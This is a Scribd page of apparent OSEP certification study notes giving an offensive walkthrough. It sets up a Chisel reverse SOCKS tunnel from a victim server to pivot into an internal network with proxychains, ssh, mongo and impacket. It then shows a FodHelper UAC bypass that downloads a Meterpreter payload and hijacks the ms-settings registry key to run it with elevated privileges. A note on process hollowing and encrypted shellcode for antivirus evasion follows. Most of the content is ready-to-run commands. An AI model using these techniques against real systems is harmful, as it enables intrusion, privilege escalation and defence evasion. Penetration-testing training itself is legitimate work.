Scribd
Upload
3K views2 pages

OSEP Additional Note

1. The document describes how to use Chisel to pivot through a victim server to gain access to an internal network. It provides commands to set up a Chisel server on Kali and connect a Chisel client on the victim machine to tunnel traffic through. 2. It also outlines how to use FodHelper to bypass UAC and execute a Meterpreter payload on the victim. It provides steps to download the payload, configure the registry to trigger it, and run FodHelper to gain elevated privileges. 3. Additional payloads may need to be generated using techniques like process hollowing and encrypted shellcode to evade antivirus detection on the victim.

Uploaded by

Hoàng Trong
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
3K views2 pages

OSEP Additional Note

1. The document describes how to use Chisel to pivot through a victim server to gain access to an internal network. It provides commands to set up a Chisel server on Kali and connect a Chisel client on the victim machine to tunnel traffic through. 2. It also outlines how to use FodHelper to bypass UAC and execute a Meterpreter payload on the victim. It provides steps to download the payload, configure the registry to trigger it, and run FodHelper to gain elevated privileges. 3. Additional payloads may need to be generated using techniques like process hollowing and encrypted shellcode to evade antivirus detection on the victim.

Uploaded by

Hoàng Trong
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd

OSEP Additional Note

1. Pivot with Chisel


Upload chisel/[Link] from Kali to c:\windows\tasks on victim server
Check your proxychains config on your Kali at /etc/[Link] . It must open
a port for listen as a proxy server

On my Kali, I config Proxychains use port 1080 for proxy server listener port
On your Kali, run follow command to create 1 Chisel server: ./chisel server -p 8080 -
-socks5 --reverse :

This command will instruct Chisel use socks5 info on /etc/proxychains to create
a chisel server with listening port is 1085
On victim, run a Chisel client to connect tunnel to the Chisel server on our Kali:
.\[Link] client -v [Link]:8080 R:1080:socks
bot chisel and [Link] are the same command above

If success, on Chisel server at Kali will appear this Listening line:

→ After that, you can use proxychains to pivot any command from your Kali directly to
internal network:

proxychains4 ssh [Link]@[Link]


proxychains mongo "mongodb://[Link]/internal_service"
proxychains python3 /usr/share/doc/python3-impacket/examples/[Link]
username:passwd@[Link]

2. FodHelper bypass UAC


Must run [Link] on x64 shell. Check shell: [Environment]::Is64BitProcess

# Put the payload in C:\[Link]

Invoke-WebRequest -Uri [Link] -Outfile

c:\windows\tasks\[Link];

# Configure the exploit

New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force

New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command"


-Name "DelegateExecute" -Value "" -Force

Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command"


-Name "(default)" -Value "C:\\windows\\tasks\\[Link]" -Force

# Run it! And FodHelper will execute our c:\windows\tasks\[Link]

C:\Windows\System32\[Link]

Sometimes, you need create your [Link] by Process Hollowing + encrypted


shellcode to AV evasion.

You might also like